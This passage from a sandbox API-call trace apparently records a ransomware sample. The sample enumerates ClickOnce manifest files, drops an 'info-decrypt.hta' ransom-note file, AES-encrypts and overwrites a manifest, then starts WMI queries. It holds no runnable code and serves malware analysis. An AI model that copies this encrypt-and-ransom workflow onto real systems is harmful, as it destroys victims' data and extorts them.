ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x42d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", cAlternateFileName="CLICEX~1.CDF")) returned 1 [0175.294] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x354b, dwReserved0=0x0, dwReserved1=0x0, cFileName="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", cAlternateFileName="CLICEX~1.MAN")) returned 1 [0175.294] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x38b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", cAlternateFileName="GOOGAP~1.CDF")) returned 1 [0175.294] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2e30, dwReserved0=0x0, dwReserved1=0x0, cFileName="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", cAlternateFileName="GOOGAP~1.MAN")) returned 1 [0175.294] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0175.295] FindClose (in: hFindFile=0xb7f750 | out: hFindFile=0xb7f750) returned 1 [0175.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0175.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0175.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0175.679] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests", lpFilePart=0x0) returned 0x58 [0175.680] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\", lpFilePart=0x0) returned 0x59 [0175.680] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f750 [0175.681] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.681] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x42d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", cAlternateFileName="CLICEX~1.CDF")) returned 1 [0175.681] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x354b, dwReserved0=0x0, dwReserved1=0x0, cFileName="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", cAlternateFileName="CLICEX~1.MAN")) returned 1 [0175.681] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x38b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", cAlternateFileName="GOOGAP~1.CDF")) returned 1 [0175.681] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2e30, dwReserved0=0x0, dwReserved1=0x0, cFileName="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", cAlternateFileName="GOOGAP~1.MAN")) returned 1 [0175.681] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2e30, dwReserved0=0x0, dwReserved1=0x0, cFileName="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", cAlternateFileName="GOOGAP~1.MAN")) returned 0 [0175.682] FindClose (in: hFindFile=0xb7f750 | out: hFindFile=0xb7f750) returned 1 [0175.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0175.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0175.683] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", nBufferLength=0x105, lpBuffer=0x949e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpFilePart=0x0) returned 0x9d [0175.683] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\info-decrypt.hta", lpFilePart=0x0) returned 0x69 [0175.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea68) returned 1 [0175.683] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949eae4 | out: lpFileInformation=0x949eae4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0175.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea64) returned 1 [0175.684] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", nBufferLength=0x105, lpBuffer=0x949e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpFilePart=0x0) returned 0x9d [0175.684] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\info-decrypt.hta", lpFilePart=0x0) returned 0x69 [0175.684] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e99c) returned 1 [0175.684] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x208 [0175.684] GetFileType (hFile=0x208) returned 0x1 [0175.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e998) returned 1 [0175.685] GetFileType (hFile=0x208) returned 0x1 [0175.685] WriteFile (in: hFile=0x208, lpBuffer=0x36fa27c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949ea60, lpOverlapped=0x0 | out: lpBuffer=0x36fa27c*, lpNumberOfBytesWritten=0x949ea60*=0x1000, lpOverlapped=0x0) returned 1 [0175.686] WriteFile (in: hFile=0x208, lpBuffer=0x36fa27c*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949ea34, lpOverlapped=0x0 | out: lpBuffer=0x36fa27c*, lpNumberOfBytesWritten=0x949ea34*=0x55e, lpOverlapped=0x0) returned 1 [0175.686] CloseHandle (hObject=0x208) returned 1 [0175.686] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpFilePart=0x0) returned 0x9d [0175.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eab4) returned 1 [0175.687] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest"), fInfoLevelId=0x0, lpFileInformation=0x36fb298 | out: lpFileInformation=0x36fb298*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1da9b2c0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0175.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eab0) returned 1 [0175.687] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", nBufferLength=0x105, lpBuffer=0x949e4f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpFilePart=0x0) returned 0x9d [0175.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9e8) returned 1 [0175.687] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0175.687] GetFileType (hFile=0x208) returned 0x1 [0175.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9e4) returned 1 [0175.687] GetFileType (hFile=0x208) returned 0x1 [0175.687] GetFileSize (in: hFile=0x208, lpFileSizeHigh=0x949eaf0 | out: lpFileSizeHigh=0x949eaf0*=0x0) returned 0x20 [0175.687] ReadFile (in: hFile=0x208, lpBuffer=0x36fb714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949ea9c, lpOverlapped=0x0 | out: lpBuffer=0x36fb714*, lpNumberOfBytesRead=0x949ea9c*=0x20, lpOverlapped=0x0) returned 1 [0175.688] CloseHandle (hObject=0x208) returned 1 [0175.688] CryptAcquireContextW (in: phProv=0x949ea3c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949ea3c*=0x66baa70) returned 1 [0175.689] CryptGenRandom (in: hProv=0x66baa70, dwLen=0x10, pbBuffer=0x36fca68 | out: pbBuffer=0x36fca68) returned 1 [0176.943] CryptImportKey (in: hProv=0x66baa70, pbData=0x36c02d8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949ea0c | out: phKey=0x949ea0c*=0xb7f290) returned 1 [0176.943] CryptContextAddRef (hProv=0x66baa70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0176.943] CryptContextAddRef (hProv=0x66baa70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0176.943] CryptDuplicateKey (in: hKey=0xb7f290, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e9fc | out: phKey=0x949e9fc*=0xb7f6d0) returned 1 [0176.943] CryptContextAddRef (hProv=0x66baa70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0176.943] CryptSetKeyParam (hKey=0xb7f6d0, dwParam=0x4, pbData=0x36c03b8*=0x1, dwFlags=0x0) returned 1 [0176.943] CryptSetKeyParam (hKey=0xb7f6d0, dwParam=0x1, pbData=0x36c0384, dwFlags=0x0) returned 1 [0176.943] CryptEncrypt (in: hKey=0xb7f6d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36c03c8*, pdwDataLen=0x949ea68*=0x30, dwBufLen=0x30 | out: pbData=0x36c03c8*, pdwDataLen=0x949ea68*=0x30) returned 1 [0176.943] CryptEncrypt (in: hKey=0xb7f6d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36c041c*, pdwDataLen=0x949ea70*=0x0, dwBufLen=0x10 | out: pbData=0x36c041c*, pdwDataLen=0x949ea70*=0x10) returned 1 [0176.945] CryptDestroyKey (hKey=0xb7f290) returned 1 [0176.945] CryptReleaseContext (hProv=0x66baa70, dwFlags=0x0) returned 1 [0176.945] CryptReleaseContext (hProv=0x66baa70, dwFlags=0x0) returned 1 [0176.945] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", nBufferLength=0x105, lpBuffer=0x949e4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpFilePart=0x0) returned 0x9d [0176.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9d4) returned 1 [0176.945] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0176.946] GetFileType (hFile=0x280) returned 0x1 [0176.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9d0) returned 1 [0176.946] GetFileType (hFile=0x280) returned 0x1 [0176.946] WriteFile (in: hFile=0x280, lpBuffer=0x36c0b60*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949ea64, lpOverlapped=0x0 | out: lpBuffer=0x36c0b60*, lpNumberOfBytesWritten=0x949ea64*=0x20, lpOverlapped=0x0) returned 1 [0176.947] CloseHandle (hObject=0x280) returned 1 [0176.947] CoTaskMemAlloc (cb=0x20c) returned 0xb61608 [0176.947] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xb61608 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0176.947] CoTaskMemFree (pv=0xb61608) [0176.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.947] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949ea10 | out: ppv=0x949ea10*=0xb51e34) returned 0x0 [0176.948] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949ea08 | out: pAptType=0x949ea08*=1) returned 0x0 [0176.948] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949ea0c | out: ppvObject=0x949ea0c*=0x0) returned 0x80004002 [0176.948] IUnknown:Release (This=0xb51e34) returned 0x1 [0176.950] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e378 | out: ppv=0x949e378*=0x6027600) returned 0x0 [0176.950] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027600, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e590 | out: ppvObject=0x949e590*=0x0) returned 0x80004002 [0176.950] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027600, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e5a4 | out: ppvObject=0x949e5a4*=0x60306a0) returned 0x0 [0176.950] WbemDefPath:IUnknown:Release (This=0x6027600) returned 0x0 [0176.950] WbemDefPath:IUnknown:QueryInterface (in: This=0x60306a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1c4 | out: ppvObject=0x949e1c4*=0x60306a0) returned 0x0 [0176.950] WbemDefPath:IUnknown:QueryInterface (in: This=0x60306a0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e180 | out: ppvObject=0x949e180*=0x0) returned 0x80004002 [0176.951] WbemDefPath:IUnknown:AddRef (This=0x60306a0) returned 0x3 [0176.951] WbemDefPath:IUnknown:QueryInterface (in: This=0x60306a0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dadc | out: ppvObject=0x949dadc*=0x0) returned 0x80004002 [0176.951] WbemDefPath:IUnknown:QueryInterface (in: This=0x60306a0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949da8c | out: ppvObject=0x949da8c*=0x0) returned 0x80004002 [0176.951] WbemDefPath:IUnknown:QueryInterface (in: This=0x60306a0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949da98 | out: ppvObject=0x949da98*=0x66cccf8) returned 0x0 [0176.951] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66cccf8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949daa0 | out: pCid=0x949daa0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0176.951] WbemDefPath:IUnknown:Release (This=0x66cccf8) returned 0x3 [0176.951] CoGetContextToken (in: pToken=0x949daf8 | out: pToken=0x949daf8) returned 0x0 [0176.951] CoGetContextToken (in: pToken=0x949df00 | out: pToken=0x949df00) returned 0x0 [0176.951] WbemDefPath:IUnknown:QueryInterface (in: This=0x60306a0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949df90 | out: ppvObject=0x949df90*=0x0) returned 0x80004002 [0176.951] WbemDefPath:IUnknown:Release (This=0x60306a0) returned 0x2 [0176.951] WbemDefPath:IUnknown:Release (This=0x60306a0) returned 0x1 [0176.951] CoGetContextToken (in: pToken=0x949e888 | out: pToken=0x949e888) returned 0x0 [0176.951] CoGetContextToken (in: pToken=0x949e7e8 | out: pToken=0x949e7e8) returned 0x0 [0176.951] WbemDefPath:IUnknown:QueryInterface (in: This=0x60306a0, riid=0x949e8b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e8b4 | out: ppvObject=0x949e8b4*=0x60306a0) returned 